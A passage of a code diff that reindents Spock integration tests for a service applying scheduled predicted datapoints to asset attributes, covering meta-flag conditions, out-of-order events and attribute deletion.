-        when: "predicted datapoints are added in the past"
-        assetPredictedDatapointService.updateValues(
-            attributeRef.getId(),
-            attributeRef.getName(),
-            [
-                new ValueDatapoint<>(now - TimeUnit.MINUTES.toMillis(1), 5d),
-                new ValueDatapoint<>(now - TimeUnit.SECONDS.toMillis(10), 7d)
-            ]
-        )
-
-        then: "the current attribute value should remain unchanged"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 99d
-            assert attribute.getTimestamp().orElse(0L) == now + 1 // +1 because of merge asset logic
-        }
+            )
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 99d
+      assert attribute.getTimestamp().orElse(0L) == now
     }
 
-    def "Does not apply values when required meta is missing"() {
-        given: "a running container and target attribute without required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
-
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
-
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
-
-        and: "a plain attribute exists without meta"
-        def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue4")
-
-        when: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
-            attributeRef.getId(),
-            attributeRef.getName(),
-            [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
-            ]
-        )
-
-        and: "time advances beyond the datapoints"
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "the attribute value should remain unchanged"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 0d
-        }
+    and: "the attribute is tagged for predicted datapoint application"
+    enablePredictedApplyMeta(assetStorageService, attributeRef.getId(), attributeRef.getName())
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(HAS_PREDICTED_DATA_POINTS)
+      assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(APPLY_PREDICTED_DATA_POINTS)
     }
 
-    def "Does not apply values when only HAS_PREDICTED_DATA_POINTS is set"() {
-        given: "a running container and target attribute with only HAS_PREDICTED_DATA_POINTS"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
-
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
-
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
-
-        and: "a plain attribute exists with only HAS_PREDICTED_DATA_POINTS"
-        def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue5")
-        addMeta(assetStorageService, attributeRef, new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
-
-        when: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+    when: "predicted datapoints are added in the past"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+              new ValueDatapoint<>(now - TimeUnit.MINUTES.toMillis(1), 5d),
+              new ValueDatapoint<>(now - TimeUnit.SECONDS.toMillis(10), 7d)
             ]
-        )
+            )
 
-        and: "time advances beyond the datapoints"
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
+    then: "the current attribute value should remain unchanged"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 99d
+      assert attribute.getTimestamp().orElse(0L) == now + 1 // +1 because of merge asset logic
+    }
+  }
 
-        then: "the attribute value should remain unchanged"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 0d
-        }
+  def "Does not apply values when required meta is missing"() {
+    given: "a running container and target attribute without required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
+
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
+
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
+
+    and: "a plain attribute exists without meta"
+    def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue4")
+
+    when: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
+            attributeRef.getId(),
+            attributeRef.getName(),
+            [
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+            ]
+            )
+
+    and: "time advances beyond the datapoints"
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
     }
 
-    def "Does not apply values when only APPLY_PREDICTED_DATA_POINTS is set"() {
-        given: "a running container and target attribute with only APPLY_PREDICTED_DATA_POINTS"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+    then: "the attribute value should remain unchanged"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 0d
+    }
+  }
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+  def "Does not apply values when only HAS_PREDICTED_DATA_POINTS is set"() {
+    given: "a running container and target attribute with only HAS_PREDICTED_DATA_POINTS"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "a plain attribute exists with only APPLY_PREDICTED_DATA_POINTS"
-        def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue6")
-        addMeta(assetStorageService, attributeRef, new MetaItem<>(APPLY_PREDICTED_DATA_POINTS, true))
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        when: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+    and: "a plain attribute exists with only HAS_PREDICTED_DATA_POINTS"
+    def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue5")
+    addMeta(assetStorageService, attributeRef, new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
+
+    when: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
             ]
-        )
+            )
 
-        and: "time advances beyond the datapoints"
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "the attribute value should remain unchanged"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 0d
-        }
+    and: "time advances beyond the datapoints"
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
     }
 
-    def "Applies values after adding required meta to existing attribute"() {
-        given: "a running container and target attribute without required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def clientEventService = container.getService(ClientEventService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+    then: "the attribute value should remain unchanged"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 0d
+    }
+  }
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+  def "Does not apply values when only APPLY_PREDICTED_DATA_POINTS is set"() {
+    given: "a running container and target attribute with only APPLY_PREDICTED_DATA_POINTS"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "we capture attribute events"
-        List<AttributeEvent> events = new CopyOnWriteArrayList<>()
-        Consumer<AttributeEvent> consumer = { event -> events.add(event) }
-        clientEventService.addSubscription(AttributeEvent.class, null, consumer)
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        and: "a plain attribute exists without meta"
-        def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue7")
+    and: "a plain attribute exists with only APPLY_PREDICTED_DATA_POINTS"
+    def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue6")
+    addMeta(assetStorageService, attributeRef, new MetaItem<>(APPLY_PREDICTED_DATA_POINTS, true))
 
-        and: "the creation event without meta has been delivered, so it cannot arrive after the meta is added"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && !it.getMeta()?.has(APPLY_PREDICTED_DATA_POINTS) }
-        }
-
-        and: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+    when: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
             ]
-        )
+            )
 
-        when: "time advances to the first datapoint"
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        and: "required meta is added"
-        enablePredictedApplyMeta(assetStorageService, attributeRef.getId(), attributeRef.getName())
-
-        and: "time advances to the second datapoint"
-        awaitScheduled(applyService, attributeRef, conditions)
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        scheduled.future.get()
-
-        then: "the second predicted value should be applied"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 20d
-            assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(2)
-        }
+    and: "time advances beyond the datapoints"
+    advancePseudoClock(3, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
     }
 
-    def "Keeps the schedule when an attribute event carries stale meta"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+    then: "the attribute value should remain unchanged"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 0d
+    }
+  }
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+  def "Applies values after adding required meta to existing attribute"() {
+    given: "a running container and target attribute without required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def clientEventService = container.getService(ClientEventService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "an attribute with the required meta is created in a single update"
-        def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue11")
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        and: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+    and: "we capture attribute events"
+    List<AttributeEvent> events = new CopyOnWriteArrayList<>()
+    Consumer<AttributeEvent> consumer = { event -> events.add(event) }
+    clientEventService.addSubscription(AttributeEvent.class, null, consumer)
+
+    and: "a plain attribute exists without meta"
+    def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue7")
+
+    and: "the creation event without meta has been delivered, so it cannot arrive after the meta is added"
+    conditions.eventually {
+      assert events.any {
+        it.ref == attributeRef && !it.getMeta()?.has(APPLY_PREDICTED_DATA_POINTS)
+      }
+    }
+
+    and: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
             ]
-        )
+            )
 
-        and: "the first datapoint is scheduled"
-        awaitScheduled(applyService, attributeRef, conditions)
+    when: "time advances to the first datapoint"
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
+    }
 
-        when: "an event without the required meta is delivered, as can happen when events arrive out of order"
-        applyService.onAttributeEvent(
+    and: "required meta is added"
+    enablePredictedApplyMeta(assetStorageService, attributeRef.getId(), attributeRef.getName())
+
+    and: "time advances to the second datapoint"
+    awaitScheduled(applyService, attributeRef, conditions)
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    scheduled.future.get()
+
+    then: "the second predicted value should be applied"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 20d
+      assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(2)
+    }
+  }
+
+  def "Keeps the schedule when an attribute event carries stale meta"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
+
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
+
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
+
+    and: "an attribute with the required meta is created in a single update"
+    def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue11")
+
+    and: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
+            attributeRef.getId(),
+            attributeRef.getName(),
+            [
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+            ]
+            )
+
+    and: "the first datapoint is scheduled"
+    awaitScheduled(applyService, attributeRef, conditions)
+
+    when: "an event without the required meta is delivered, as can happen when events arrive out of order"
+    applyService.onAttributeEvent(
             new AttributeEvent(attributeRef, 0d, now).setMeta(new MetaMap())
-        )
+            )
 
-        then: "the schedule should be kept because the stored attribute still has the required meta"
-        assert isScheduled(applyService, attributeRef)
+    then: "the schedule should be kept because the stored attribute still has the required meta"
+    assert isScheduled(applyService, attributeRef)
 
-        when: "time advances to the first datapoint"
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        scheduled.future.get()
+    when: "time advances to the first datapoint"
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    scheduled.future.get()
 
-        then: "the first predicted value should still be applied"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 10d
-            assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(1)
-        }
+    then: "the first predicted value should still be applied"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 10d
+      assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(1)
     }
+  }
 
-    def "Does not apply values after removing required meta from attribute"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+  def "Does not apply values after removing required meta from attribute"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        and: "an attribute with the required meta is created in a single update"
-        def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue8")
+    and: "an attribute with the required meta is created in a single update"
+    def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue8")
 
-        and: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+    and: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
             ]
-        )
+            )
 
-        when: "time advances to the first datapoint"
-        awaitScheduled(applyService, attributeRef, conditions)
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        scheduled.future.get()
+    when: "time advances to the first datapoint"
+    awaitScheduled(applyService, attributeRef, conditions)
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    scheduled.future.get()
 
-        then: "the first predicted value should be applied"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 10d
-            assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(1)
-        }
-
-        when: "required meta is removed"
-        removeMeta(assetStorageService, attributeRef, HAS_PREDICTED_DATA_POINTS)
-        removeMeta(assetStorageService, attributeRef, APPLY_PREDICTED_DATA_POINTS)
-
-        and: "time advances beyond the datapoints"
-        advancePseudoClock(2, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "the attribute value should remain unchanged"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 10d
-        }
+    then: "the first predicted value should be applied"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 10d
+      assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(1)
     }
 
-    def "Does not emit attribute events after attribute deletion"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def clientEventService = container.getService(ClientEventService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+    when: "required meta is removed"
+    removeMeta(assetStorageService, attributeRef, HAS_PREDICTED_DATA_POINTS)
+    removeMeta(assetStorageService, attributeRef, APPLY_PREDICTED_DATA_POINTS)
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+    and: "time advances beyond the datapoints"
+    advancePseudoClock(2, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
+    }
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    then: "the attribute value should remain unchanged"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 10d
+    }
+  }
 
-        and: "we capture attribute events"
-        List<AttributeEvent> events = new CopyOnWriteArrayList<>()
-        Consumer<AttributeEvent> consumer = { event -> events.add(event) }
-        clientEventService.addSubscription(AttributeEvent.class, null, consumer)
+  def "Does not emit attribute events after attribute deletion"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def clientEventService = container.getService(ClientEventService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "an attribute with the required meta is created in a single update"
-        def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue9")
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "the creation event has been delivered to the service before it is observed here"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && it.getMeta()?.has(APPLY_PREDICTED_DATA_POINTS) }
-        }
-        events.clear()
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        and: "predicted datapoints are added in the future"
-        assetPredictedDatapointService.updateValues(
+    and: "we capture attribute events"
+    List<AttributeEvent> events = new CopyOnWriteArrayList<>()
+    Consumer<AttributeEvent> consumer = { event -> events.add(event) }
+    clientEventService.addSubscription(AttributeEvent.class, null, consumer)
+
+    and: "an attribute with the required meta is created in a single update"
+    def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue9")
+
+    and: "the creation event has been delivered to the service before it is observed here"
+    conditions.eventually {
+      assert events.any {
+        it.ref == attributeRef && it.getMeta()?.has(APPLY_PREDICTED_DATA_POINTS)
+      }
+    }
+    events.clear()
+
+    and: "predicted datapoints are added in the future"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d),
-                new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(3), 30d)
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d),
+              new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(3), 30d)
             ]
-        )
+            )
 
-        when: "time advances to the middle of the predicted datapoints"
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "an attribute event should have been emitted for the applied value"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && it.value.orElse(null) == 10d }
-        }
-
-        when: "the attribute is deleted"
-        def asset = assetStorageService.find(attributeRef.getId())
-        asset.getAttributes().remove(attributeRef.getName())
-        assetStorageService.merge(asset)
-
-        then: "the deletion event is observed"
-        conditions.eventually {
-            assert events.any { it.ref == attributeRef && it.deleted }
-        }
-
-        when: "we clear events and advance time past all datapoints"
-        events.clear()
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-        if (scheduled != null) {
-            scheduled.future.get()
-        }
-
-        then: "the scheduled prediction for the attribute is cancelled"
-        conditions.eventually {
-            assert !applyService.scheduledEntries.containsKey(attributeRef)
-        }
-
-        and: "no further non-deletion attribute events are emitted for the attribute"
-        assert !events.any { it.ref == attributeRef && !it.deleted }
+    when: "time advances to the middle of the predicted datapoints"
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    if (scheduled != null) {
+      scheduled.future.get()
     }
 
-    def "Does not emit attribute events after asset deletion"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def clientEventService = container.getService(ClientEventService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+    then: "an attribute event should have been emitted for the applied value"
+    conditions.eventually {
+      assert events.any { it.ref == attributeRef && it.value.orElse(null) == 10d }
+    }
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+    when: "the attribute is deleted"
+    def asset = assetStorageService.find(attributeRef.getId())
+    asset.getAttributes().remove(attributeRef.getName())
+    assetStorageService.merge(asset)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
